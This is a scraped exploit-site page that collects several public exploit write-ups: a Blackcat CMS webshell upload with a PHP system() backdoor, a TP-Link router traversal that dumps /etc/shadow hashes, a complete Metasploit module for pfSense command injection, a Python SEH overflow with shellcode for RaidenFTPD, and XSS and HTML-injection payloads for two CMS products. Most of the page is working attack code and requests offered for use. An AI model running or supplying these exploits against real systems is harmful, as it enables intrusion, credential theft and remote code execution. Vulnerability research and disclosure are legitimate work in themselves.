Exploit Title: Blackcat Cms v1.4 - Remote Code Execution (RCE) Application: blackcat Cms Version: v1.4 Bugs: RCE Technology: PHP Vendor URL: https://blackcat-cms.org/ Software Link: https://github.com/BlackCatDevelopment/BlackCatCMS Date of found: 13.07.2023 Author: Mirabbas Ağalarov Tested on: Linux 2. Technical Details & POC ======================================== steps: 1. login to account as admin 2. go to admin-tools => jquery plugin (http://localhost/BlackCatCMS-1.4/upload/backend/admintools/tool.php?tool=jquery_plugin_mgr) 3. upload zip file but this zip file must contains poc.php poc.php file contents <?php $a=$_GET['code']; echo system($a);?> 4.Go to http://localhost/BlackCatCMS-1.4/upload/modules/lib_jquery/plugins/poc/poc.php?code=cat%20/etc/passwd Poc request POST /BlackCatCMS-1.4/upload/backend/admintools/tool.php?tool=jquery_plugin_mgr HTTP/1.1 Host: localhost Content-Length: 577 Cache-Control: max-age=0 sec-ch-ua: sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "" Upgrade-Insecure-Requests: 1 Origin: http://localhost Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBRByJwW3CUSHOcBT User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: http://localhost/BlackCatCMS-1.4/upload/backend/admintools/tool.php?tool=jquery_plugin_mgr Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: cat7288sessionid=7uv7f4kj7hm9q6jnd6m9luq0ti Connection: close ------WebKitFormBoundaryBRByJwW3CUSHOcBT Content-Disposition: form-data; name="upload" 1 ------WebKitFormBoundaryBRByJwW3CUSHOcBT Content-Disposition: form-data; name="userfile"; filename="poc.zip" Content-Type: application/zip PKvalsdalsfapoc.php<?php $a=$_GET['code']; echo system($a); ?> blabalaboalpoc.php blablabla ------WebKitFormBoundaryBRByJwW3CUSHOcBT Content-Disposition: form-data; name="submit" Upload ------WebKitFormBoundaryBRByJwW3CUSHOcBT--
HireHackking

TP-Link TL-WR740N - Authenticated Directory Transversal

HACKER · %s · %s

# Exploit Title: TP-Link TL-WR740N - Authenticated Directory Transversal # Date: 13/7/2023 # Exploit Author: Anish Feroz (Zeroxinn) # Vendor Homepage: http://www.tp-link.com # Version: TP-Link TL-WR740n 3.12.11 Build 110915 Rel.40896n # Tested on: TP-Link TL-WR740N ---------------------------POC--------------------------- Request ------- GET /help/../../../etc/shadow HTTP/1.1 Host: 192.168.0.1:8082 Authorization: Basic YWRtaW46YWRtaW4= Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: close Response -------- HTTP/1.1 200 OK Server: Router Webserver Connection: close WWW-Authenticate: Basic realm="TP-LINK Wireless Lite N Router WR740N" Content-Type: text/html <META http-equiv=Content-Type content="text/html; charset=iso-8859-1"> <HTML> <HEAD><TITLE>TL-WR740N</TITLE> <META http-equiv=Pragma content=no-cache> <META http-equiv=Expires content="wed, 26 Feb 1997 08:21:57 GMT"> <LINK href="/dynaform/css_help.css" rel=stylesheet type="text/css"> <SCRIPT language="javascript" type="text/javascript"><!-- if(window.parent == window){window.location.href="http://192.168.0.1";} function Click(){ return false;} document.oncontextmenu=Click; function doPrev(){history.go(-1);} //--></SCRIPT> root:$1$$zdlNHiCDxYDfeF4MZL.H3/:10933:0:99999:7::: Admin:$1$$zdlNHiCDxYDfeF4MZL.H3/:10933:0:99999:7::: bin::10933:0:99999:7::: daemon::10933:0:99999:7::: adm::10933:0:99999:7::: lp:*:10933:0:99999:7::: sync:*:10933:0:99999:7::: shutdown:*:10933:0:99999:7::: halt:*:10933:0:99999:7::: uucp:*:10933:0:99999:7::: operator:*:10933:0:99999:7::: nobody::10933:0:99999:7::: ap71::10933:0:99999:7:::
HireHackking

pfSense v2.7.0 - OS Command Injection

HACKER · %s · %s

# Exploit Title: pfSense v2.7.0 - OS Command Injection #Exploit Author: Emir Polat # CVE-ID : CVE-2023-27253 class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager include Msf::Exploit::FileDropper prepend Msf::Exploit::Remote::AutoCheck def initialize(info = {}) super( update_info( info, 'Name' => 'pfSense Restore RRD Data Command Injection', 'Description' => %q{ This module exploits an authenticated command injection vulnerabilty in the "restore_rrddata()" function of pfSense prior to version 2.7.0 which allows an authenticated attacker with the "WebCfg - Diagnostics: Backup & Restore" privilege to execute arbitrary operating system commands as the "root" user. This module has been tested successfully on version 2.6.0-RELEASE. }, 'License' => MSF_LICENSE, 'Author' => [ 'Emir Polat', # vulnerability discovery & metasploit module ], 'References' => [ ['CVE', '2023-27253'], ['URL', 'https://redmine.pfsense.org/issues/13935'], ['URL', 'https://github.com/pfsense/pfsense/commit/ca80d18493f8f91b21933ebd6b714215ae1e5e94'] ], 'DisclosureDate' => '2023-03-18', 'Platform' => ['unix'], 'Arch' => [ ARCH_CMD ], 'Privileged' => true, 'Targets' => [ [ 'Automatic Target', {}] ], 'Payload' => { 'BadChars' => "\x2F\x27", 'Compat' => { 'PayloadType' => 'cmd', 'RequiredCmd' => 'generic netcat' } }, 'DefaultOptions' => { 'RPORT' => 443, 'SSL' => true }, 'DefaultTarget' => 0, 'Notes' => { 'Stability' => [CRASH_SAFE], 'Reliability' => [REPEATABLE_SESSION], 'SideEffects' => [CONFIG_CHANGES, IOC_IN_LOGS] } ) ) register_options [ OptString.new('USERNAME', [true, 'Username to authenticate with', 'admin']), OptString.new('PASSWORD', [true, 'Password to authenticate with', 'pfsense']) ] end def check unless login return Exploit::CheckCode::Unknown("#{peer} - Could not obtain the login cookies needed to validate the vulnerability!") end res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'diag_backup.php'), 'method' => 'GET', 'keep_cookies' => true ) return Exploit::CheckCode::Unknown("#{peer} - Could not connect to web service - no response") if res.nil? return Exploit::CheckCode::Unknown("#{peer} - Check URI Path, unexpected HTTP response code: #{res.code}") unless res.code == 200 unless res&.body&.include?('Diagnostics: ') return Exploit::CheckCode::Safe('Vulnerable module not reachable') end version = detect_version unless version return Exploit::CheckCode::Detected('Unable to get the pfSense version') end unless Rex::Version.new(version) < Rex::Version.new('2.7.0-RELEASE') return Exploit::CheckCode::Safe("Patched pfSense version #{version} detected") end Exploit::CheckCode::Appears("The target appears to be running pfSense version #{version}, which is unpatched!") end def login # Skip the login process if we are already logged in. return true if @logged_in csrf = get_csrf('index.php', 'GET') unless csrf print_error('Could not get the expected CSRF token for index.php when attempting login!') return false end res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'index.php'), 'method' => 'POST', 'vars_post' => { '__csrf_magic' => csrf, 'usernamefld' => datastore['USERNAME'], 'passwordfld' => datastore['PASSWORD'], 'login' => '' }, 'keep_cookies' => true ) if res && res.code == 302 @logged_in = true true else false end end def detect_version res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'index.php'), 'method' => 'GET', 'keep_cookies' => true ) # If the response isn't a 200 ok response or is an empty response, just return nil. unless res && res.code == 200 && res.body return nil end if (%r{Version.+<strong>(?<version>[0-9.]+-RELEASE)\n?</strong>}m =~ res.body).nil? nil else version end end def get_csrf(uri, methods) res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, uri), 'method' => methods, 'keep_cookies' => true ) unless res && res.body return nil # If no response was returned or an empty response was returned, then return nil. end # Try regex match the response body and save the match into a variable named csrf. if (/var csrfMagicToken = "(?<csrf>sid:[a-z0-9,;:]+)";/ =~ res.body).nil? return nil # No match could be found, so the variable csrf won't be defined. else return csrf end end def drop_config csrf = get_csrf('diag_backup.php', 'GET') unless csrf fail_with(Failure::UnexpectedReply, 'Could not get the expected CSRF token for diag_backup.php when dropping the config!') end post_data = Rex::MIME::Message.new post_data.add_part(csrf, nil, nil, 'form-data; name="__csrf_magic"') post_data.add_part('rrddata', nil, nil, 'form-data; name="backuparea"') post_data.add_part('', nil, nil, 'form-data; name="encrypt_password"') post_data.add_part('', nil, nil, 'form-data; name="encrypt_password_confirm"') post_data.add_part('Download configuration as XML', nil, nil, 'form-data; name="download"') post_data.add_part('', nil, nil, 'form-data; name="restorearea"') post_data.add_part('', 'application/octet-stream', nil, 'form-data; name="conffile"') post_data.add_part('', nil, nil, 'form-data; name="decrypt_password"') res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'diag_backup.php'), 'method' => 'POST', 'ctype' => "multipart/form-data; boundary=#{post_data.bound}", 'data' => post_data.to_s, 'keep_cookies' => true ) if res && res.code == 200 && res.body =~ /<rrddatafile>/ return res.body else return nil end end def exploit unless login fail_with(Failure::NoAccess, 'Could not obtain the login cookies!') end csrf = get_csrf('diag_backup.php', 'GET') unless csrf fail_with(Failure::UnexpectedReply, 'Could not get the expected CSRF token for diag_backup.php when starting exploitation!') end config_data = drop_config if config_data.nil? fail_with(Failure::UnexpectedReply, 'The drop config response was empty!') end if (%r{<filename>(?<file>.*?)</filename>} =~ config_data).nil? fail_with(Failure::UnexpectedReply, 'Could not get the filename from the drop config response!') end config_data.gsub!(' ', '${IFS}') send_p = config_data.gsub(file, "WAN_DHCP-quality.rrd';#{payload.encoded};") post_data = Rex::MIME::Message.new post_data.add_part(csrf, nil, nil, 'form-data; name="__csrf_magic"') post_data.add_part('rrddata', nil, nil, 'form-data; name="backuparea"') post_data.add_part('yes', nil, nil, 'form-data; name="donotbackuprrd"') post_data.add_part('yes', nil, nil, 'form-data; name="backupssh"') post_data.add_part('', nil, nil, 'form-data; name="encrypt_password"') post_data.add_part('', nil, nil, 'form-data; name="encrypt_password_confirm"') post_data.add_part('rrddata', nil, nil, 'form-data; name="restorearea"') post_data.add_part(send_p.to_s, 'text/xml', nil, "form-data; name=\"conffile\"; filename=\"rrddata-config-pfSense.home.arpa-#{rand_text_alphanumeric(14)}.xml\"") post_data.add_part('', nil, nil, 'form-data; name="decrypt_password"') post_data.add_part('Restore Configuration', nil, nil, 'form-data; name="restore"') res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'diag_backup.php'), 'method' => 'POST', 'ctype' => "multipart/form-data; boundary=#{post_data.bound}", 'data' => post_data.to_s, 'keep_cookies' => true ) if res print_error("The response to a successful exploit attempt should be 'nil'. The target responded with an HTTP response code of #{res.code}. Try rerunning the module.") end end end
HireHackking

Active Super Shop CMS v2.5 - HTML Injection Vulnerabilities

HACKER · %s · %s

# Exploit Title: Active Super Shop CMS v2.5 - HTML Injection Vulnerabilities References (Source): https://www.vulnerability-lab.com/get_content.php?id=2278 Release Date: 2023-07-04 Vulnerability Laboratory ID (VL-ID): 2278 Common Vulnerability Scoring System: 5.4 Product & Service Introduction: =============================== https://codecanyon.net/item/active-super-shop-multivendor-cms/12124432 Abstract Advisory Information: ============================== The vulnerability laboratory core research team discovered multiple html injection vulnerabilities in the Active Super Shop Multi-vendor CMS v2.5 web-application. Affected Product(s): ==================== ActiveITzone Product: Active Super Shop CMS v2.5 (CMS) (Web-Application) Vulnerability Disclosure Timeline: ================================== 2021-08-20: Researcher Notification & Coordination (Security Researcher) 2021-08-21: Vendor Notification (Security Department) 2021-**-**: Vendor Response/Feedback (Security Department) 2021-**-**: Vendor Fix/Patch (Service Developer Team) 2021-**-**: Security Acknowledgements (Security Department) 2023-07-05: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Exploitation Technique: ======================= Remote Severity Level: =============== Medium Authentication Type: ==================== Restricted Authentication (User Privileges) User Interaction: ================= Low User Interaction Disclosure Type: ================ Responsible Disclosure Technical Details & Description: ================================ Multiple html injection web vulnerabilities has been discovered in the official Active Super Shop Multi-vendor CMS v2.5 web-application. The web vulnerability allows remote attackers to inject own html codes with persistent vector to manipulate application content. The persistent html injection web vulnerabilities are located in the name, phone and address parameters of the manage profile and products branding module. Remote attackers with privileged accountant access are able to inject own malicious script code in the name parameter to provoke a persistent execution on profile view or products preview listing. There are 3 different privileges that are allowed to access the backend like the accountant (low privileges), the manager (medium privileges) or the admin (high privileges). Accountants are able to attack the higher privileged access roles of admins and manager on preview of the elements in the backend to compromise the application. The request method to inject is post and the attack vector is persistent located on the application-side. Successful exploitation of the vulnerabilities results in session hijacking, persistent phishing attacks, persistent external redirects to malicious source and persistent manipulation of affected application modules. Request Method(s): [+] POST Vulnerable Module(s): [+] Manage Details Vulnerable Parameter(s): [+] name [+] phone [+] address Affected Module(s): [+] manage profile [+] products branding Proof of Concept (PoC): ======================= The html injection web vulnerabilities can be exploited by remote attackers with privileged accountant access and with low user interaction. For security demonstration or to reproduce the persistent cross site web vulnerability follow the provided information and steps below to continue. Exploitation: Payload <img src="https://[DOMAIN]/[PATH]/[PICTURE].*"> Vulnerable Source: manage_admin & branding <div class="tab-pane fade active in" id="" style="border:1px solid #ebebeb; border-radius:4px;"> <div class="panel-heading"> <h3 class="panel-title">Manage Details</h3> </div> <form action="https://assm_cms.localhost:8080/shop/admin/manage_admin/update_profile/" class="form-horizontal" method="post" accept-charset="utf-8"> <div class="panel-body"> <div class="form-group"> <label class="col-sm-3 control-label" for="demo-hor-1">Name</label> <div class="col-sm-6"> <input type="text" name="name" value="Mr. Accountant"><img src="https://MALICIOUS-DOMAIN.com/gfx/logo-header.png">" id="demo-hor-1" class="form-control required"> </div></div> <div class="form-group"> <label class="col-sm-3 control-label" for="demo-hor-2">Email</label> <div class="col-sm-6"> <input type="email" name="email" value="accountant@shop.com" id="demo-hor-2" class="form-control required"> </div></div> <div class="form-group"> <label class="col-sm-3 control-label" for="demo-hor-3"> Phone</label> <div class="col-sm-6"> <input type="text" name="phone" value="017"><img src="https://MALICIOUS-DOMAIN.com/gfx/logo-header.png">" id="demo-hor-3" class="form-control"> </div></div> --- PoC Session Logs (POST) --- https://assm_cms.localhost:8080/shop/admin/manage_admin/update_profile/ Host: assm_cms.localhost:8080 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Accept: text/html, */*; q=0.01 X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------280242453224137385302547344680 Content-Length: 902 Origin:https://assm_cms.localhost:8080 Connection: keep-alive Referer:https://assm_cms.localhost:8080/shop/admin/manage_admin/ Cookie: ci_session=5n6fmo5q5gvik6i5hh2b72uonuem9av3; curr=1 - POST: HTTP/3.0 200 OK content-type: text/html; charset=UTF-8 ci_session=5n6fmo5q5gvik6i5hh2b72uonuem9av3; path=/; HttpOnly https://assm_cms.localhost:8080/shop/admin/manage_admin/ Host: assm_cms.localhost:8080 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Connection: keep-alive Reference(s): https://assm_cms.localhost:8080/shop/ https://assm_cms.localhost:8080/shop/admin/ https://assm_cms.localhost:8080/shop/admin/manage_admin/ https://assm_cms.localhost:8080/shop/admin/manage_admin/update_profile/ Solution - Fix & Patch: ======================= Disallow inseration of html code for input fields like name, adress and phone. Sanitize the content to secure deliver. Security Risk: ============== The security risk of the html injection web vulnerabilities in the shopping web-application are estimated as medium. Credits & Authors: ================== Vulnerability-Lab [Research Team] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
HireHackking

RaidenFTPD 2.4.4005 - Buffer Overflow (SEH)

HACKER · %s · %s

# Exploit Title: RaidenFTPD 2.4.4005 - Buffer Overflow (SEH) # Date: 18/07/2023 # Exploit Author: Andre Nogueira # Vendor Homepage: https://www.raidenftpd.com/en/ # Software Link: http://www.raidenmaild.com/download/raidenftpd2.exe # Version: RaidenFTPD 2.4.4005 # Tested on: Microsoft Windows 10 Build 19045 # 1.- Open RaidenFTPD # 2.- Click on 'Setup' -> 'Step by step setup wizard' # 3.- Run python code: exploit-raidenftpd.py # 4.- Paste the content of exploit-raiden.txt into the field 'Server name' # 5.- Click 'next' -> 'next' -> 'ok' # 6.- Pop calc.exe #!/usr/bin/env python3 from struct import pack crash = 2000 offset = 497 # msfvenom -p windows/exec CMD="calc.exe" -a x86 -f python -v shellcode --b "\x00\x0d" shellcode = b"\x90" * 8 shellcode += b"\xb8\x9c\x78\x14\x60\xd9\xc2\xd9\x74\x24\xf4" shellcode += b"\x5a\x33\xc9\xb1\x31\x83\xea\xfc\x31\x42\x0f" shellcode += b"\x03\x42\x93\x9a\xe1\x9c\x43\xd8\x0a\x5d\x93" shellcode += b"\xbd\x83\xb8\xa2\xfd\xf0\xc9\x94\xcd\x73\x9f" shellcode += b"\x18\xa5\xd6\x34\xab\xcb\xfe\x3b\x1c\x61\xd9" shellcode += b"\x72\x9d\xda\x19\x14\x1d\x21\x4e\xf6\x1c\xea" shellcode += b"\x83\xf7\x59\x17\x69\xa5\x32\x53\xdc\x5a\x37" shellcode += b"\x29\xdd\xd1\x0b\xbf\x65\x05\xdb\xbe\x44\x98" shellcode += b"\x50\x99\x46\x1a\xb5\x91\xce\x04\xda\x9c\x99" shellcode += b"\xbf\x28\x6a\x18\x16\x61\x93\xb7\x57\x4e\x66" shellcode += b"\xc9\x90\x68\x99\xbc\xe8\x8b\x24\xc7\x2e\xf6" shellcode += b"\xf2\x42\xb5\x50\x70\xf4\x11\x61\x55\x63\xd1" shellcode += b"\x6d\x12\xe7\xbd\x71\xa5\x24\xb6\x8d\x2e\xcb" shellcode += b"\x19\x04\x74\xe8\xbd\x4d\x2e\x91\xe4\x2b\x81" shellcode += b"\xae\xf7\x94\x7e\x0b\x73\x38\x6a\x26\xde\x56" shellcode += b"\x6d\xb4\x64\x14\x6d\xc6\x66\x08\x06\xf7\xed" shellcode += b"\xc7\x51\x08\x24\xac\xae\x42\x65\x84\x26\x0b" shellcode += b"\xff\x95\x2a\xac\xd5\xd9\x52\x2f\xdc\xa1\xa0" shellcode += b"\x2f\x95\xa4\xed\xf7\x45\xd4\x7e\x92\x69\x4b" shellcode += b"\x7e\xb7\x09\x0a\xec\x5b\xe0\xa9\x94\xfe\xfc" nSEH = b"\xeb\x06\x90\x90" # short jump of 8 bytes SEH = pack("<L", 0x7c1e76ff) # pop eax; pop esi; ret; => msvcp70.dll buffer = b"A" * offset buffer += nSEH buffer += SEH buffer += shellcode buffer += b"D" * (crash -len(buffer)) file_payload = open("exploit-raiden.txt", 'wb') print("[*] Creating the .txt file for out payload") file_payload.write(buffer) print("[*] Writing malicious payload to the .txt file") file_payload.close()
HireHackking

PaulPrinting CMS - (Search Delivery) Cross Site Scripting

HACKER · %s · %s

Exploit Title: PaulPrinting CMS - (Search Delivery) Cross Site Scripting References (Source): ==================== https://www.vulnerability-lab.com/get_content.php?id=2286 Release Date: ============= 2023-07-17 Vulnerability Laboratory ID (VL-ID): ==================================== 2286 Common Vulnerability Scoring System: ==================================== 5.2 Vulnerability Class: ==================== Cross Site Scripting - Non Persistent Product & Service Introduction: =============================== PaulPrinting is designed feature rich, easy to use, search engine friendly, modern design and with a visually appealing interface. (Copy of the Homepage:https://codecanyon.net/user/codepaul ) Abstract Advisory Information: ============================== The vulnerability laboratory core research team discovered a non-persistent cross site vulnerability in the PaulPrinting (v2018) cms web-application. Vulnerability Disclosure Timeline: ================================== 2022-08-25: Researcher Notification & Coordination (Security Researcher) 2022-08-26: Vendor Notification (Security Department) 2022-**-**: Vendor Response/Feedback (Security Department) 2022-**-**: Vendor Fix/Patch (Service Developer Team) 2022-**-**: Security Acknowledgements (Security Department) 2023-07-17: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Exploitation Technique: ======================= Remote Severity Level: =============== Medium Authentication Type: ==================== Open Authentication (Anonymous Privileges) User Interaction: ================= Medium User Interaction Disclosure Type: ================ Responsible Disclosure Technical Details & Description: ================================ A client-side cross site scripting vulnerability has been discovered in the official PaulPrinting (v2018) cms web-application. Remote attackers are able to manipulate client-side requests by injection of malicious script code to compromise user session data. The client-side cross site scripting web vulnerability is located in the search input field with the insecure validated q parameter affecting the delivery module. Remote attackers are able to inject own malicious script code to the search input to provoke a client-side script code execution without secure encode. The request method to execute is GET and the attack vector is non-persistent. Successful exploitation of the vulnerability results in session hijacking, non-persistent phishing attacks, non-persistent external redirects to malicious source and non-persistent manipulation of affected application modules. Request Method(s): [+] GET Vulnerable Module(s): [+] /account/delivery Vulnerable Input(s): [+] Search Vulnerable Parameter(s): [+] q Affected Module(s): [+] /account/delivery [+] Delivery Contacts Proof of Concept (PoC): ======================= The non-persistent xss web vulnerability can be exploited by remote attackers with low privileged user account and medium user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. PoC: Example https://codeawesome.in/printing/account/delivery?q= PoC: Exploitation https://codeawesome.in/printing/account/delivery?q=a"><iframe src=evil.source onload=alert(document.cookie)> --- PoC Session Logs (GET) --- https://codeawesome.in/printing/account/delivery?q=a"><iframe src=evil.source onload=alert(document.cookie)> Host: codeawesome.in Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Connection: keep-alive Cookie: member_login=1; member_id=123; session_id=25246428fe6e707a3be0e0ce54f0e5bf; - GET: HTTP/3.0 200 OK content-type: text/html; charset=UTF-8 x-powered-by: PHP/7.1.33 Vulnerable Source: (Search - delivery?q=) <div class="col-lg-8"> <a href="https://codeawesome.in/printing/account/delivery" class="btn btn-primary mt-4 mb-2 float-right"> <i class="fa fa-fw fa-plus"></i> </a> <form class="form-inline mt-4 mb-2" method="get"> <div class="input-group mb-3 mr-2"> <input type="text" class="form-control" name="q" value="a"><iframe src="evil.source" onload="alert(document.cookie)">"> <div class="input-group-append"> <button class="btn btn-outline-secondary" type="submit" id="button-addon2"><i class="fa fa-fw fa-search"></i></button> </div></div> Security Risk: ============== The security risk of the cross site scripting web vulnerability with non-persistent attack vector is estimated as medium. Credits & Authors: ================== Vulnerability-Lab [Research Team] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab